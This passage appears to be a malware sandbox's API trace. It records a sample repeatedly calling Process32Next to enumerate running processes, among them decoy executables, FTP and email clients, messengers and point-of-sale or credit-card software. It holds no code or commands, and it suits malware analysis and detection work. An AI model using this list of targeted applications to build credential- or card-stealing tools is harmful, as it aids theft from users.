th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.736] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.738] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.739] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.740] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.742] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.745] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.747] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.748] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.750] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.751] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.753] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.755] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.757] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.759] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.861] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.863] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.865] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.867] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0219.869] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0219.871] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0219.873] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0219.875] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0219.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0219.933] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0219.935] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0219.936] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0219.938] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0219.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0219.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0219.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0219.946] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0219.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0219.952] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0219.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0219.955] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0219.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.958] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.965] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.967] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.969] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.978] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.082] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.091] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.093] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.107] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0220.109] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.200] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.201] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.203] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.204] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.206] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.208] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.211] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.215] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.217] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.220] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0220.222] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0220.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0220.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0220.226] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0220.228] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.231] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 